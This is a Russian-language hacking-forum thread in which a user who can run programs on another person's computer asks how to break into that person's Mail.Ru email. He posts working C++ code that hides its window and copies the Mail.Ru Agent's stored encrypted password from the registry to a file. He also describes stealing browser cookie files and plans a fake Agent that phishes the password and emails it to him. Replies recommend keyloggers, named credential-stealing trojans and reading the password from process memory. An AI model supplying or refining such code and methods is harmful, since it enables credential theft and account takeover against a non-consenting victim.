Форум АНТИЧАТ - Взлом пароля email; Mail.Ru агент 5.2 . Кража шифрованного пароля с помощью C++

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Реверсинг (https://forum.antichat.xyz/forumdisplay.php?f=94)

Взлом пароля email; Mail.Ru агент 5.2 . Кража шифрованного пароля с помощью C++

Привет. Я имею возможность запустить программу на компе чела, мыло которого хочу взломать. Его мыло, ну к примеру email@mail.ru и он использует Mail.Ru анент 5.2 . В более ранних версиях майл агента можно было легко расшифровать пароль, но в этой версии что то непонятно как его расшифровать. Или как можно использовать этот зашифрованный пароль? Ситуация такая. Я создал код на Borland C++ Builder, который копирует содержимое раздела в реестре, отвечающего за его мыло. Вот код:

//---------------------------------------------------------------------------

#include <vcl.h>

#pragma hdrstop

#include <stdio.h>

#include <stdlib.h>

#include <malloc.h>

#include "Unit1.h"

//---------------------------------------------------------------------------

#pragma package(smart_init)

#pragma resource "*.dfm"

TForm1 *Form1;

const char *RegKey = "Software\\Mail.Ru\\Agent\\magent_logins";

//---------------------------------------------------------------------------

__fastcall TForm1::TForm1(TComponent* Owner)

: TForm(Owner)

{

int t = 0;

TRegistry *reg = new TRegistry;

reg->OpenKey(RegKey,true);

void *p = malloc(60);

if (t==0) {t = reg->ReadBinaryData("000#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("001#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("002#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("003#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("004#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("005#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("006#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("007#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("008#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("009#email@mail.ru",p,60);}

if (t==0) {t = reg->ReadBinaryData("010#email@mail.ru",p,60);}

char *x = (char *) p;

for (int i = 0; i<=t; i++)

{

if (x[i]==0) x[i] = 1;

}

Memo1->Clear();

Memo1->Lines->Add(x);

Memo1->Lines->SaveToFile("C:\\res.dat");

free(p);

delete reg;

reg = NULL;

}

//---------------------------------------------------------------------------

void __fastcall TForm1::FormPaint(TObject *Sender)

{

Hide();

}

//---------------------------------------------------------------------------

Ну в общем я украл этот пароль, вставил эти 48 байтов в свой реестр в эту же ветку реестра и в эту же учетную запись (только на своем компе). Но майл агент все равно требует ввести пароль.. :-( Видимо агент еще с чем то взаимодействует. Но если бы я смог расшифровать этот шифрованый пароль, то я бы взломал его мыло. Хэлм ми, плиз. :'( хны. Дайте какие нибудь полезные коды, или расскажите способы как можно украсть этот пароль в незашифрованном виде что-ли.... Я ведь имею возможность запустить на его компе любую программу.

Можно заюзать кейлогер

Цитата:

Можно заюзать кейлогер

тоже самое считаю, зачем обходить реку если можно её переплыть?!

Alexandr II, да? А если у него пароль просто сохранен в магенте, то кейлогер никак не поможет.
qenguru, раз у тебя есть доступ к его пк, то исполни просто ему пинч( авось пароль в браузере где нибудь сохранен еще), или лучше всего тебе тут подойдет троян Grim 0.5, он из магента 5.2 пароли тащит, погугли, он в паблике есть.

дай мне шифрованый пароль.

анн нет. походу на разных машинах по разному шифрует. поэтому у тя и не заработало. и расшифровать получица только на месте.
как вариант можно стырить пароль из памяти. ты можеш запустить там отладчик?)

Цитата:

как вариант можно стырить пароль из памяти. ты можеш запустить там отладчик?)

ReadProcessMemory не проще?)))

содержимое зашифр. пароля такое (в шестнадцатеричном виде):
6D 1B E3 D9 C3 6F 73 42 5D 71 56 77 CE B5 45 53 E7 BE E9 19 12 39 98 42 (6C 74 46 0D 0A)

Те последние 5 байтов которые указаны в скобках - это сама моя программа добавила их, они к паролю не относятся. То есть получается 8 х 3 = 24 байта зашифрованного пароля. ;-)

Еще добавлю, к теме взлома... Он пользуется Opera (браузер такой). Я своровал у него файл cookies4.dat и вставил в свою оперу, его кукисы стали мне доступны. Все параметры страниц которые он посещал мне доступны (язык, цвет фона и т.д.). Даже удалось закачать файл с сайта www.bestreferat.ru по секретной ссылке в кукиесе. Но файла wand.dat у него не было. Это значит что пароли автоматически не сохранялись в его компе. :-( Видимо пароли он вводил вручную. Далее, я своровал кукис от интернет експлорера (Internet Explorer), но там тоже пароль не сохранен.

Я придумал способ. Я могу временно подменить его оригинальный майл агент, на свой ложный агент. Могу создать прогу, эмулирующую фальшивый майл ру агент. Он попробует подключиться к своей учетной записи, и прога предложить ввести пароль. Он подумает: "Блин... я же вроде вводил пароль раньше? Куда он исчез?" И введет этот пароль, мнимый агент сохранить в файле этот пароль, причем в незашифрованном виде, и направит мне его на мою электронную почту. :-D Но это как то непрофессионально, я считаю. Это я сделаю в последнем случае (если другого выхода не найду).

можешь удалить пароль, а потом кейлогер